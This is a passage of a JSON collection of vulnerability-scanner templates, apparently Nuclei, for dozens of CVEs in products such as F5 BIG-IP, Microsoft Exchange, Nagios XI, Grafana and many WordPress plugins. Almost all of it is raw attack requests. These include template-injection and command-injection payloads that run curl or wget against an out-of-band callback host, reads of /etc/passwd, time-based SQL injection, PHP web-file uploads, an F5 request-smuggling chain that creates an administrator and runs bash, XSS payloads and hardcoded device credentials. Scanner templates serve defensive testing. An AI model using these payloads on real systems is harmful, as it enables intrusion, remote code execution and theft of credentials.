application/json\n\n{\n  \"sql\": \"<#assign ex=\\\"freemarker.template.utility.Execute\\\"?new()>${ex(\\\"curl http://{{interactsh-url}}\\\")} \",\n  \"type\": \"0\"\n}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"http\") || contains(interactsh_protocol, \"dns\")","status_code == 200","contains(content_type,\"application/json\")","contains(body,\"success\")"],"condition":"and"}]}]},{"id":"CVE-2023-0527","info":{"name":"Online Security Guards Hiring System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /search-request.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchdata=<img%20src=x%20onerror=alert(document.domain)>&search=\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<img src=x onerror=alert(document.domain)>\")","contains(body, \"Online Security Gauard Hiring System |Search Request\")"],"condition":"and"}]}]},{"id":"CVE-2023-5074","info":{"name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /dview8/api/usersByLevel HTTP/1.1\nHost: {{Hostname}}\nAuthorization: eyJhbGciOiAiSFMyNTYiLCJ0eXAiOiAiand0In0.eyJvcmdJZCI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODA5YWEiLCJ1c2VySWQiOiAiNTkxNzFkNTYtZTZiNC00Nzg5LTkwZmYtYTdhMjdmZDQ4NTQ4IiwidHlwZSI6IDMsImtleSI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODkwYmIiLCJpYXQiOiAxNjg2NzY1MTk4LCJqdGkiOiAiZmRhOGU1YzNlNWY1MTQ5MDMzZThiM2FkNWI3ZDhjMjUiLCJuYmYiOiAxNjg2NzYxNTk4LCJleHAiOiAxODQ0NDQ1MTk4fQ.5swhQdiev4r8ZDNkJAFVkGfRTIaUQlwVue2AI18CrcI\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"userName\") && contains(body, \"passWord\") && contains(body, \"isEmailActivate\")","contains(header, \"application/json\")"],"condition":"and"}]}]},{"id":"CVE-2023-4521","info":{"name":"Import XML and RSS Feeds < 2.1.5 - Unauthenticated RCE","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Import XML and RSS Feeds"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/import-xml-feed/uploads/169227090864de013cac47b.php?cmd=ping+{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-28665","info":{"name":"Woo Bulk Price Update <2.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=techno_get_products&page=<svg%20onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<svg onload=alert(document.domain)>\")","contains(body_2, \"pagination\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2023-50719","info":{"name":"XWiki < 4.10.15 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale=","{{BaseURL}}/xwiki/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale="],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["hash:SHA</span>","XWikiUsers[0].password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29623","info":{"name":"Purchase Order Management v1.0 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{randstr}}&password=%3cimg%20src%3dx%20onerror%3dalert(document.domain)%3e\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","incorrect"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-46347","info":{"name":"PrestaShop Step by Step products Pack - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /modules/ndk_steppingpack/search-result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearch_query=1%22%29;select+0x73656c65637420736c6565702836293b+into+@a;prepare+b+from+@a;execute+b;--\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type, \"text/html\")","contains(header, \"PrestaShop\")"],"condition":"and"}]}]},{"id":"CVE-2023-30256","info":{"name":"Webkul QloApps 1.5.2 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["xss onfocus=alert(document.domain) autofocus= xss","hasConfirmation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6018","info":{"name":"Mlflow - Arbitrary File Write","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{model_name}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{model_name}}\", \"source\": \"http://{{interactsh-url}}/api/2.0/mlflow-artifacts/artifacts/\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{model_name}}\", \"source\": \"models:/{{model_name}}/1\"}\n","GET /model-versions/get-artifact?path=random&name={{model_name}}&version=2 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["\"registered_model\":","\"name\":"],"condition":"and"}]}]},{"id":"CVE-2023-46747","info":{"name":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","severity":"critical"},"requests":[{"raw":["POST /tmui/login.jsp HTTP/1.1\nHost: {{Hostname}}\nTransfer-Encoding: chunked, chunked\nContent-Type: application/x-www-form-urlencoded\n\n204\n{{ hex_decode(concat(\"0008485454502f312e310000122f746d75692f436f6e74726f6c2f666f726d0000093132372e302e302e310000096c6f63616c686f73740000096c6f63616c686f7374000050000003000b546d75692d44756262756600000b424242424242424242424200000a52454d4f5445524f4c450000013000a00b00096c6f63616c686f73740003000561646d696e000501715f74696d656e6f773d61265f74696d656e6f775f6265666f72653d2668616e646c65723d253266746d756925326673797374656d25326675736572253266637265617465262626666f726d5f706167653d253266746d756925326673797374656d253266757365722532666372656174652e6a737025336626666f726d5f706167655f6265666f72653d26686964654f626a4c6973743d265f62756676616c75653d65494c3452556e537758596f5055494f47634f4678326f30305863253364265f62756676616c75655f6265666f72653d2673797374656d757365722d68696464656e3d5b5b2241646d696e6973747261746f72222c225b416c6c5d225d5d2673797374656d757365722d68696464656e5f6265666f72653d266e616d653d\",username,\"266e616d655f6265666f72653d267061737377643d\",password,\"267061737377645f6265666f72653d2666696e69736865643d782666696e69736865645f6265666f72653d00ff00\")) }}\n0\n\n"],"unsafe":true},{"raw":["PATCH /mgmt/tm/auth/user/{{hex_decode(username)}} HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64(hex_decode(username)+\":\"+hex_decode(password))}}\nContent-Type: application/json\n\n{\"password\": \"{{password2}}\"}\n\n","POST /mgmt/shared/authn/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"username\":\"{{hex_decode(username)}}\", \"password\":\"{{pass}}\"}\n\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nX-F5-Auth-Token: {{token}}\nContent-Type: application/json\n\n{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}\n\n"],"payloads":{"pass":["{{password2}}","{{hex_decode(password)}}"]},"skip-variables-check":true,"stop-at-first-match":true,"extractors":[{"type":"regex","part":"body_2","name":"token","group":1,"regex":["([A-Z0-9]{26})"],"internal":true},{"type":"regex","part":"body_3","group":1,"regex":["\"commandResult\":\"(.*)\""]},{"type":"dsl","dsl":["\"Username:\" + hex_decode(username)","\"Password:\" + pass","\"Token:\" + token"]}],"matchers":[{"type":"word","words":["commandResult","uid="],"condition":"and"}]}]},{"id":"CVE-2023-22893","info":{"name":"Strapi Versions <=4.5.6 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /api/auth/cognito/callback?access_token={{to_lower(rand_text_alpha(8))}}&id_token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.{{base64(payload)}}. HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"provider\":","\"confirmed\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"json","part":"body","name":"token","json":[".jwt"]}]}]},{"id":"CVE-2023-38433","info":{"name":"Fujitsu IP Series - Hardcoded Credentials","severity":"high"},"requests":[{"raw":["GET /b_download/index.html HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64(username + ':' + password)}}\n"],"attack":"pitchfork","payloads":{"username":["fedish264pro","fedish265pro"],"password":["h264pro@broadsight","h265pro@broadsight"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Field Support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40978","info":{"name":"MKdocs 1.2.2 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27358","info":{"name":"Grafana Unauthenticated Snapshot Creation","severity":"high"},"requests":[{"raw":["POST /api/snapshots HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"dashboard\": {\"editable\":false,\"hideControls\":true,\"nav\":[{\"enable\":false,\"type\":\"timepicker\"}],\"rows\": [{}],\"style\":\"dark\",\"tags\":[],\"templating\":{\"list\":[]},\"time\":{},\"timezone\":\"browser\",\"title\":\"Home\",\"version\":5},\"expires\": 3600}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"deleteUrl\":","\"deleteKey\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2021-22873","info":{"name":"Revive Adserver <5.1.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ads/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/openx/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/revive/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/www/delivery/lg.php?dest=http://interact.sh"],"stop-at-first-match":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-39165","info":{"name":"Cachet <=2.3.18 - SQL Injection","severity":"medium"},"requests":[{"raw":["@timeout: 20s\nGET /api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))-- HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"pagination\") && contains(body, \"data\")"],"condition":"and"}]}]},{"id":"CVE-2021-31602","info":{"name":"Hitachi Vantara Pentaho/Business Intelligence Server - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pentaho/api/userrolelist/systemRoles?require-cfg.js","{{BaseURL}}/api/userrolelist/systemRoles?require-cfg.js"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<roleList>","<roles>Anonymous</roles>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21978","info":{"name":"VMware View Planner <4.6 SP1- Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: text/html\nReferer: {{BaseURL}}\nConnection: close\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"logfile\"; filename=\"\"\nContent-Type: text/plain\n\nPOC_TEST\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body) == 28"]},{"type":"word","part":"body","words":["File uploaded successfully."]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24226","info":{"name":"AccessAlly <3.5.7 - Sensitive Information Leakage","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div id=\"accessally-testing-data\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46704","info":{"name":"GenieACS => 1.2.8 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/ping/;`id`"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["uid=([0-9]+)"]},{"type":"status","status":[500]}],"extractors":[{"type":"regex","regex":["uid=(\\d+)\\((\\w+)\\)"],"part":"body"}]}]},{"id":"CVE-2021-28377","info":{"name":"Joomla! ChronoForums 2.0.11 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44528","info":{"name":"Open Redirect in Host Authorization Middleware","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-Host: //interact.sh\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[301,302,307,308]}]}]},{"id":"CVE-2021-28937","info":{"name":"Acexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/password.html"],"matchers-condition":"and","matchers":[{"type":"word","words":["Password Setting","addCfg('username'","addCfg('newpass'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25298","info":{"name":"Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20wget%20{{interactsh-url}}%3b HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["Connection Information","Host Check"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-41749","info":{"name":"CraftCMS SEOmatic - Server-Side Template Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-Host: {{Hostname}}/{{marker}}{{{{num1}}*{{num2}}}}\nCache-Control: max-age=0\n\n","GET / HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-Host: xxx{{['cat /etc/passwd']|filter('system')}}bbb\nCache-Control: max-age=0\n\n"],"skip-variables-check":true,"stop-at-first-match":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(body_1, \"/{{marker}}{{result}}\") || regex(\"root:.*:0:0:\", body_2)","contains_any(body, \"Craft CMS\", \"SEOmatic\" ,\"CRAFT_CSRF\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-24499","info":{"name":"WordPress Workreap - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------cd0dc6bdc00b1cf9\nX-Requested-With: XMLHttpRequest\n\n-----------------------------cd0dc6bdc00b1cf9\nContent-Disposition: form-data; name=\"action\"\n\nworkreap_award_temp_file_uploader\n-----------------------------cd0dc6bdc00b1cf9\nContent-Disposition: form-data; name=\"award_img\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-httpd-php\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n-----------------------------cd0dc6bdc00b1cf9--\n","GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37538","info":{"name":"PrestaShop SmartBlog <4.0.6 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c5fe25896e49ddfe996db7508cf00534"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44848","info":{"name":"Thinfinity VirtualUI User Enumeration","severity":"medium"},"requests":[{"raw":["GET /changePassword?username=administrator HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\"rc\":(.*?)","\"msg\":\"(.*?)\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33221","info":{"name":"CommScope Ruckus IoT Controller - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/service/v1/service-details"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","words":["message","ok","data","dns","gateway"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25067","info":{"name":"Landing Page Builder < 1.4.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=ulpb_post&page=page-builder-new-landing-page&thisPostID=test\"+style=animation-name:rotation+onanimationstart=alert(document.domain)+x= HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"test\\\\\\\" style=animation-name:rotation onanimationstart=alert(document.domain)\")","contains(body_2, \"Enter Page Title\")"],"condition":"and"}]}]},{"id":"CVE-2021-27520","info":{"name":"FUDForum 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D","{{BaseURL}}/forum/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D%22"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=alert(document.domain) x=","FUDforum"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25079","info":{"name":"Contact Form Entries < 1.2.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ez2u4g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'contact-form')"],"condition":"and"}]}]},{"id":"CVE-2021-24169","info":{"name":"WordPress Advanced Order Export For WooCommerce <3.1.8 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"woo-order-export-lite\")"],"condition":"and"}]}]},{"id":"CVE-2021-24276","info":{"name":"WordPress Supsystic Contact Form <1.7.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25003","info":{"name":"WordPress WPCargo Track & Trace <6.9.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n2={{md5(num)}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 != 200","status_code_2 == 200","status_code_3 == 200","contains(body_3, md5(num))","contains(body_3, 'PNG')"],"condition":"and"}]}]},{"id":"CVE-2021-26855","info":{"name":"Microsoft Exchange Server SSRF Vulnerability","severity":"critical"},"requests":[{"raw":["GET /owa/auth/x.js HTTP/1.1\nHost: {{Hostname}}\nCookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-24155","info":{"name":"WordPress BackupGuard <1.6.0 - Authenticated Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=backup_guard_backups HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: multipart/form-data; boundary=---------------------------204200867127808062083805313921\n\n-----------------------------204200867127808062083805313921\nContent-Disposition: form-data; name=\"files[]\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php\n\necho \"CVE-2021-24155\";\n\n?>\n\n-----------------------------204200867127808062083805313921--\n","GET /wp-content/uploads/backup-guard/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_3, '{\\\"success\\\":1}')","contains(body_4, 'CVE-2021-24155')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["BG_BACKUP_STRINGS = {\"nonce\":\"([0-9a-zA-Z]+)\"};"],"internal":true}]}]},{"id":"CVE-2021-30151","info":{"name":"Sidekiq <=6.2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/auth HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"email\":\"{{username}}\",\"password\":\"{{password}}\"}\n","GET /queues/\"onmouseover=\"alert(document.domain)\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=\"alert(document.domain)","sidekiq"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45428","info":{"name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n","PUT /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n\nCVE-2021-45428\n","GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 404 && status_code_2 == 201","contains(body_3, \"CVE-2021-45428\") && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-24320","info":{"name":"WordPress Bello Directory & Listing Theme <1.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/wp-content/themes/bello/readme.txt"],"stop-at-first-match":true,"matchers":[{"type":"word","internal":true,"words":["wp-content/themes/bello/fonts","bold-themes.com/bello"],"condition":"or"}]},{"method":"GET","path":["{{BaseURL}}/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24442","info":{"name":"Wordpress Polls Widget < 1.5.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nPOST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Forwarded-For: {{randstr}}\n\nquestion_id=1&poll_answer_securety=8df73ed4ee&date_answers%5B0%5D=SLEEP(5)\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains_all(body, \"{\\\"answer_name\", \"vote\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2021-46068","info":{"name":"Vehicle Service Management System - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Users.php?f=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 